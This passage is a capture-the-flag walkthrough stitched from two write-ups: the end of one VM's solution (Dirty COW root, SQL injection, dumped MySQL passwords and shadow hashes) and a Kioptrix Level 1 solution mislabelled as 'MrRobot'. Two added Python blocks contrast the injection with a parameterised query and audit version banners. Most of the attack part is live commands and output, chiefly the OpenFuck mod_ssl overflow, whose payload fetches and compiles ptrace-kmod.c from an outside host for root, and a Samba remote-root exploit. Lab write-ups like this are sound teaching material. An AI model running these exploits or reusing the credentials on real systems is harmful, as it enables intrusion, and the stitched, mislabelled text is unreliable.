 dirty.c:109:28: warning: no newline at end of file
 sh-3.00$ ./peroot
 sh-3.00# whoami
 root
It gives root access.

Examining Files :

By examining the PHP files in the webroot directory we find the user 'john' and its password 'hiroshima' in the mysql_connect() call.
 sh-3.00# cd /var/www/html
 sh-3.00# ls
 index.php
 pingit.php
 sh-3.00# cat index.php
 <?php
     mysql_connect("localhost", "john", "hiroshima") or die(mysql_error());
     //print "Connected to MySQL<br />";
     mysql_select_db("webapp");
 
     if ($_POST['uname'] != ""){
         $username = $_POST['uname'];
         $password = $_POST['psw'];
         $query = "SELECT * FROM users WHERE username = '$username' AND password='$password'";
         //print $query."<br>";
 ...
 ...
 ...
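The query in index.php above is what makes the `psw` injection work: both form values are spliced into the SQL text. As an added example (not the VM's code), here is that query rebuilt in Python over an in-memory SQLite copy of the users table dumped later on the page, beside the parameterised form that closes the hole. The payload `' or 1=1 --` is used instead of the page's `' or 1='1 --+` because the latter relies on MySQL coercing the text '1 --+' to the number 1, which SQLite does not do.

```python
"""SQL injection in the index.php login, reproduced against SQLite."""
import sqlite3
from typing import List, Tuple

Row = Tuple[int, str, str]


def make_db() -> sqlite3.Connection:
    """In-memory copy of webapp.users as dumped on the page (constructed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users(id INT, username VARCHAR(100), password VARCHAR(10))")
    conn.executemany("INSERT INTO users VALUES(?, ?, ?)",
                     [(1, "admin", "5afac8d85f"), (2, "john", "66lajGGbla")])
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> List[Row]:
    """Same construction as index.php: the untrusted values become SQL text.

    A quote in either field rewrites the WHERE clause, and '--' comments out
    whatever the application appended after the injected value.
    """
    query = (f"SELECT * FROM users WHERE username = '{username}' "
             f"AND password='{password}'")
    return conn.execute(query).fetchall()


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> List[Row]:
    """Parameterised query: values travel separately from the SQL text.

    "' or 1=1 --" is now compared literally as a password and never parsed.
    (A real fix would also store a password hash, not the plaintext the VM keeps.)
    """
    query = "SELECT * FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchall()


if __name__ == "__main__":
    db = make_db()
    payload = "' or 1=1 --"
    print("vulnerable:", login_vulnerable(db, "admin", payload))   # every row
    print("safe:      ", login_safe(db, "admin", payload))         # no row
```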
Using john's credentials we can't access the system with ssh, but we can access the MySQL database. Now try to execute commands in mysql :
 sh-3.00# mysql -u john -phiroshima -e 'show databases;'
 Database
 mysql
 test
 webapp
 sh-3.00# mysql -u john -phiroshima -e 'use webapp;show tables;'
 Tables_in_webapp
 users
 sh-3.00# mysql -u john -phiroshima -e 'use webapp;select * from users;'
 id username password
 1   admin   5afac8d85f
 2   john    66lajGGbla
Now at least we have the login passwords for the users of the index.php login page.

We can also look in the .mysql_history file for commands previously typed by users :
 show databases;
 create database webapp;
 use webapp;
 create table users(id INT,username varchar(100),password varchar(10));
 show database;
 select * from users;
 show databases;
 use webapp;
 insert into users values(1,'admin','hello');
 select * from users;
 use mysql
 show databases;
 use mysql;
 select * from users where user=john;
 show tables;
 select * from user where user=john;
 select * from user where user='john';
 select * from user;
 create user 'john'@'localhost' identified by 'hiroshima';
 create user 'webapp'@'localhost' identified by 'hiroshima';
 create user 'webapp'@'localhost' IDENTIFIED BY 'hiroshima';
 CREATE USER 'webapp'@'localhost' identified by 'hiroshima';
 update user set password = password('hiroshima') where user = 'john';
 use mysql;
 show users;
 select * from user;
 create user 'john'@'localhost' identified by 'hiroshima';
 version;
 -v
 ;
 help
 flush privileges;
 show databases;
 use mysql;
 grant select,insert,update,delete on *.* to 'john'@'localhost';
 update user set password = password('hiroshima') where user = 'john';
 flush priveleges;
 use webapp;
 show tables;
 update user set password = password('Ha56!blaKAbl') where user = 'admin';
 update username set password = password('Ha56!blaKAbl') where user = 'admin';
 select * from users;
 update username set password = password('Ha56!blaKAbl') where username = 'admin';
 update users set password = password('Ha56!blaKAbl') where username = 'admin';
 select * from users;
 insert into users values(2,'john','66lajGGbla');
 select * from users;
From the /etc/shadow file we get the users' password hashes :
 root:$1$FTpMLT88$VdzDQTTcksukSKMLRSVlc.:14529:0:99999:7:::
 john:$1$wk7kHI5I$2kNTw6ncQQCecJ.5b8xTL1:14525:0:99999:7:::
 harold:$1$7d.sVxgm$3MYWsHDv0F/LP.mjL9lp/1:14529:0:99999:7:::

Kioptrix: Level 1 (#1) CTF VM WalkThrough

VM : MrRobot

Download Link : https://www.vulnhub.com/entry/kioptrix-level-1-1,22/

Scanning the whole 192.168.1.0/24 network :
 $ nmap -sP 192.168.1.0/24
 
 Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-07 15:45 UTC
 Nmap scan report for 192.168.1.1
 Host is up (0.059s latency).
 Nmap scan report for 192.168.1.3
 Host is up (0.000035s latency).
 Nmap scan report for 192.168.1.4
 Host is up (0.081s latency).
 Nmap scan report for 192.168.1.104
 Host is up (0.00051s latency).
 Nmap done: 256 IP addresses (4 hosts up) scanned in 18.67 seconds
Our target is 192.168.1.104.

Scanning the target :
 $ nmap -sV -O 192.168.1.104 -oN nmap.scan
 
 Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-07 15:58 UTC
 Nmap scan report for 192.168.1.104
 Host is up (0.00053s latency).
 Not shown: 994 closed ports
 PORT     STATE SERVICE     VERSION
 22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
 80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
 111/tcp  open  rpcbind     2 (RPC #100000)
 139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
 443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
 1024/tcp open  status      1 (RPC #100024)
 Device type: general purpose
 Running: Linux 2.4.X
 OS CPE: cpe:/o:linux:linux_kernel:2.4.7
 OS details: Linux 2.4.7
 Network Distance: 2 hops
 
 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 Nmap done: 1 IP address (1 host up) scanned in 21.35 seconds
Operating System :  Linux 2.4.X | cpe:/o:linux:linux_kernel:2.4.7 | Linux 2.4.7 

Scanning URL with dirb : 
 By The Dark Raver
 -----------------
 
 OUTPUT_FILE: dirb.scan
 START_TIME: Tue Apr  7 16:35:19 2020
 URL_BASE: http://192.168.1.104/
 WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
 
 -----------------
 
 GENERATED WORDS: 4612
 
 ---- Scanning URL: http://192.168.1.104/ ----
 + http://192.168.1.104/~operator (CODE:403|SIZE:273)
 + http://192.168.1.104/~root (CODE:403|SIZE:269)
 + http://192.168.1.104/cgi-bin/ (CODE:403|SIZE:272)
 + http://192.168.1.104/index.html (CODE:200|SIZE:2890)
 ==> DIRECTORY: http://192.168.1.104/manual/
 ==> DIRECTORY: http://192.168.1.104/mrtg/
 ==> DIRECTORY: http://192.168.1.104/usage/
 
 ---- Entering directory: http://192.168.1.104/manual/ ----
 (!) WARNING: Directory IS LISTABLE. No need to scan it.
     (Use mode '-w' if you want to scan it anyway)
 
 ---- Entering directory: http://192.168.1.104/mrtg/ ----
 + http://192.168.1.104/mrtg/index.html (CODE:200|SIZE:17318)
 
 ---- Entering directory: http://192.168.1.104/usage/ ----
 + http://192.168.1.104/usage/index.html (CODE:200|SIZE:4810)
 
 -----------------
 END_TIME: Tue Apr  7 16:35:41 2020
 DOWNLOADED: 13836 - FOUND: 6

Scanning path/files with dirsearch :
 
 Extensions: php, asp, aspx, jsp, html, zip, jar, sql | HTTP method: get | Threads: 10 | Wordlist size: 8678
 
 Error Log: /root/tools/dirsearch/logs/errors-20-04-07_17-33-40.log
 
 Target: http://192.168.1.104
 
 [17:33:40] Starting:
 /bin/bash: ]: command not found
 [17:33:41] 403 -  277B  - /.htaccess-dev
 [17:33:41] 403 -  279B  - /.htaccess-local
 [17:33:41] 403 -  268B  - /.hta
 [17:33:41] 403 -  277B  - /.htaccess.BAK
 [17:33:41] 403 -  279B  - /.htaccess-marco
 [17:33:41] 403 -  278B  - /.htaccess.bak1
 [17:33:41] 403 -  278B  - /.htaccess.orig
 [17:33:41] 403 -  277B  - /.htaccess.old
 [17:33:41] 403 -  278B  - /.htaccess.save
 [17:33:41] 403 -  277B  - /.htaccess.txt
 [17:33:41] 403 -  280B  - /.htaccess.sample
 [17:33:41] 403 -  279B  - /.htaccess_extra
 [17:33:41] 403 -  276B  - /.htaccess_sc
 [17:33:41] 403 -  278B  - /.htaccess_orig
 [17:33:41] 403 -  276B  - /.htaccessBAK
 [17:33:41] 403 -  276B  - /.htaccessOLD
 [17:33:41] 403 -  277B  - /.htaccessOLD2
 [17:33:41] 403 -  274B  - /.htaccess~
 [17:33:41] 403 -  272B  - /.htgroup
 [17:33:41] 403 -  277B  - /.htpasswd-old
 [17:33:41] 403 -  278B  - /.htpasswd_test
 [17:33:41] 403 -  274B  - /.htpasswds
 [17:33:41] 403 -  272B  - /.htusers
 [17:33:48] 403 -  272B  - /cgi-bin/
 [17:33:49] 403 -  268B  - /doc/
 [17:33:49] 403 -  282B  - /doc/stable.version
 [17:33:49] 403 -  283B  - /doc/en/changes.html
 [17:33:51] 200 -    3KB - /index.html
 [17:33:52] 301 -  294B  - /manual  ->  http://127.0.0.1/manual/
 [17:33:56] 200 -   27B  - /test.php
 [17:33:57] 200 -    5KB - /usage/
 
 Task Completed
Findings :
[17:33:51] 200 -    3KB - /index.html
[17:33:56] 200 -   27B  - /test.php
[17:33:57] 200 -    5KB - /usage/
Now at `http://192.168.1.104/usage/` there is a page generated by Webalizer Version 2.01, and a search for it gives "Webalizer 2.1.x Buffer Overflow vulnerability", which allows remote users to execute arbitrary code on the server via reverse DNS lookups. But I didn't find any exploit for that. However there is an XSS vulnerability: to exploit it, just send a curl request with the payload in the Referer header, which then gets added to the http://192.168.1.104/usage/usage_DATE.html page. But this is not very useful.

Now try to exploit findings from nmap, which are :
 22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
 80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
 111/tcp  open  rpcbind     2 (RPC #100000)
 139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
 443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
 1024/tcp open  status      1 (RPC #100024)
Searching for `Apache 1.3.20` :  

The above search leads to `Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow`, and we can see that on our target server the mod_ssl version is 2.8.4, so we can try this buffer overflow. The exploit can be found here :  https://www.exploit-db.com/exploits/47080 (newer version). So first we download the exploit and follow the instructions given on that page :
 $ ./OpenFuck | grep 1.3.20 | grep RedHat
     0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
     0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2
 
 $ ./OpenFuck 0x6b 192.168.1.104 443 -c 40
 
 *******************************************************************
 * OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
 *******************************************************************
 * by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
 * #hackarena  irc.brasnet.org                                     *
 * TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
 * #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
 * #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
 *******************************************************************
 
 Connection... 40 of 40
 Establishing SSL connection
 cipher: 0x4043808c   ciphers: 0x80f8088
 Ready to send shellcode
 Spawning shell...
 bash: no job control in this shell
 bash-2.05$
 d.c; ./exploit; -kmod.c; gcc -o exploit ptrace-kmod.c -B /usr/bin; rm ptrace-kmo
 --15:11:51--  https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
            => `ptrace-kmod.c'
 Connecting to dl.packetstormsecurity.net:443... connected!
 HTTP request sent, awaiting response... 200 OK
 Length: 3,921 [text/x-csrc]
 
     0K ...                                                   100% @   3.74 MB/s
 
 15:11:53 (1.87 MB/s) - `ptrace-kmod.c' saved [3921/3921]
 
 /usr/bin/ld: cannot open output file exploit: Permission denied
 collect2: ld returned 1 exit status
 gcc: file path prefix `/usr/bin' never used
 ls
 exploit
 whoami
 root
Try 2 or 3 times if the exploit does not work (because the payload downloads a file "ptrace-kmod.c" from the internet). We get a root shell. From here we can get the /etc/shadow and /etc/passwd files. Copy them to the local system and try to crack the users' passwords with john :
 $ unshadow passwdfile shadowfile > crack.passwd.db
 $ john crack.passwd.db

Samba service :

A Samba service is also running (revealed by the nmap scan). Now enumerating the Samba service :

with nbtscan :
 nbtscan 192.168.1.104
 Doing NBT name scan for addresses from 192.168.1.104
 
 IP address       NetBIOS Name     Server    User             MAC address
 ------------------------------------------------------------------------------
 192.168.1.104    KIOPTRIX         <server>  KIOPTRIX         00:00:00:00:00:00

with enum4linux :
 ./enum4linux.pl 192.168.1.104
 WARNING: polenum.py is not in your path.  Check that package is installed and your PATH is sane.
 Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Apr  7 20:29:41 2020
 
  ==========================
 |    Target Information    |
  ==========================
 Target ........... 192.168.1.104
 RID Range ........ 500-550,1000-1050
 Username ......... ''
 Password ......... ''
 Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
 
 
  =====================================================
 |    Enumerating Workgroup/Domain on 192.168.1.104    |
  =====================================================
 [+] Got domain/workgroup name: MYGROUP
 
  =============================================
 |    Nbtstat Information for 192.168.1.104    |
  =============================================
 Looking up status of 192.168.1.104
     KIOPTRIX        <00> -         B <ACTIVE>  Workstation Service
     KIOPTRIX        <03> -         B <ACTIVE>  Messenger Service
     KIOPTRIX        <20> -         B <ACTIVE>  File Server Service
     ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
     MYGROUP         <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
     MYGROUP         <1d> -         B <ACTIVE>  Master Browser
     MYGROUP         <1e> - <GROUP> B <ACTIVE>  Browser Service Elections
 
     MAC Address = 00-00-00-00-00-00
 
  ======================================
 |    Session Check on 192.168.1.104    |
  ======================================
 [E] Server doesn't allow session using username '', password ''.  Aborting remainder of tests.
Unfortunately the above scan did not give the Samba version, so I am going to use a Metasploit auxiliary module to get it:
 msf5 > search scanner/smb
 msf5 > use auxiliary/scanner/smb/smb_version
 msf5 auxiliary(scanner/smb/smb_version) > show options
 
 Module options (auxiliary/scanner/smb/smb_version):
 
    Name       Current Setting  Required  Description
    ----       ---------------  --------  -----------
    RHOSTS                      yes       The target address range or CIDR identifier
    SMBDomain  .                no        The Windows domain to use for authentication
    SMBPass                     no        The password for the specified username
    SMBUser                     no        The username to authenticate as
    THREADS    1                yes       The number of concurrent threads
 
 msf5 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.1.104
 RHOSTS => 192.168.1.104
 msf5 auxiliary(scanner/smb/smb_version) > run
 
 [*] 192.168.1.104:139     - Host could not be identified: Unix (Samba 2.2.1a)
 [*] 192.168.1.104:445     - Scanned 1 of 1 hosts (100% complete)
 [*] Auxiliary module execution completed
The Samba version is 2.2.1a. Searching "samba 2.2.1a vulnerability" I found the "Samba < 2.2.8 (Linux/BSD) - Remote Code Execution" exploit at https://www.exploit-db.com/exploits/10
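Both findings in this writeup come down to a service advertising a version older than the fixed release (mod_ssl below 2.8.7, Samba below 2.2.8). The following is an added example, not part of the original post, of how a defender can turn the same banner data into an inventory check; the sample banners are constructed, only the two vulnerable versions are the ones seen above, and the version ordering rule for letter suffixes like "2.2.1a" is an assumption based on Samba's release naming.

```python
import re

# Versions at which the two flaws used in this writeup were fixed, taken
# from the exploit titles quoted above (mod_ssl < 2.8.7, Samba < 2.2.8).
PATCHED = {
    "mod_ssl": "2.8.7",
    "Samba": "2.2.8",
}

# Matches "mod_ssl/2.8.4" in an Apache Server header or "Samba 2.2.1a" in
# an SMB fingerprint; other components in the banner are ignored.
_BANNER_RE = re.compile(r"\b(mod_ssl|Samba)[/ ](\d+(?:\.\d+)*[a-z]?)")

# Constructed sample banners (not captured from any real host). The first
# two carry the versions seen in the writeup, the other two are patched.
SAMPLE_BANNERS = [
    "Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b",
    "Unix (Samba 2.2.1a)",
    "Unix (Samba 3.0.20)",
    "Apache/1.3.27 (Unix) mod_ssl/2.8.12 OpenSSL/0.9.6g",
]

def parse_version(v):
    """'2.2.1a' -> ((2, 2, 1, 0), 'a'): numeric fields zero-padded to four,
    plus the letter suffix; a suffix is a post-release, so 2.2.1 < 2.2.1a."""
    m = re.fullmatch(r"(\d+(?:\.\d+)*)([a-z]?)", v)
    if not m:
        raise ValueError("unrecognised version string: %r" % v)
    nums = tuple(int(x) for x in m.group(1).split("."))
    nums += (0,) * (4 - len(nums))
    return nums, m.group(2)

def is_vulnerable(component, version):
    """True if the advertised version is older than the fixed release."""
    return parse_version(version) < parse_version(PATCHED[component])

def audit_banners(banners):
    """Return (component, found_version, fixed_version) for every banner
    that advertises a version older than the fix."""
    findings = []
    for banner in banners:
        for component, version in _BANNER_RE.findall(banner):
            if is_vulnerable(component, version):
                findings.append((component, version, PATCHED[component]))
    return findings

if __name__ == "__main__":
    for component, found, fixed in audit_banners(SAMPLE_BANNERS):
        print("%s %s is older than fixed release %s" % (component, found, fixed))
```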

Now download and try the exploit:
 $ wget https://www.exploit-db.com/raw/10
 $ mv 10 sambal.c
 $ gcc -o sambal sambal.c
 $ ./sambal
 samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
 --------------------------------------------------------------
 Usage: ./sambal [-bBcCdfprsStv] [host]
 
 -b <platform>   bruteforce (0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2)
 -B <step>       bruteforce steps (default = 300)
 -c <ip address> connectback ip address
 -C <max childs> max childs for scan/bruteforce mode (default = 40)
 -d <delay>      bruteforce/scanmode delay in micro seconds (default = 100000)
 -f              force
 -p <port>       port to attack (default = 139)
 -r <ret>        return address
 -s              scan mode (random)
 -S <network>    scan mode
 -t <type>       presets (0 for a list)
 -v              verbose mode
 
 $ ./sambal -b 0 -v 192.168.1.104
 samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
 --------------------------------------------------------------
 + Verbose mode.
 + Bruteforce mode. (Linux)
 + Host is running samba.
 + Using ret: [0xbffffed4]
 + Using ret: [0xbffffda8]
 + Using ret: [0xbffffc7c]
 + Using ret: [0xbffffb50]
 + Worked!
 --------------------------------------------------------------
 *** JE MOET JE MUIL HOUWE
 Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
 uid=0(root) gid=0(root) groups=99(nobody)
 ls
 exploit
 whoami
 root
and the exploit works.

So we have two methods to get a root shell on kioptrix1.1.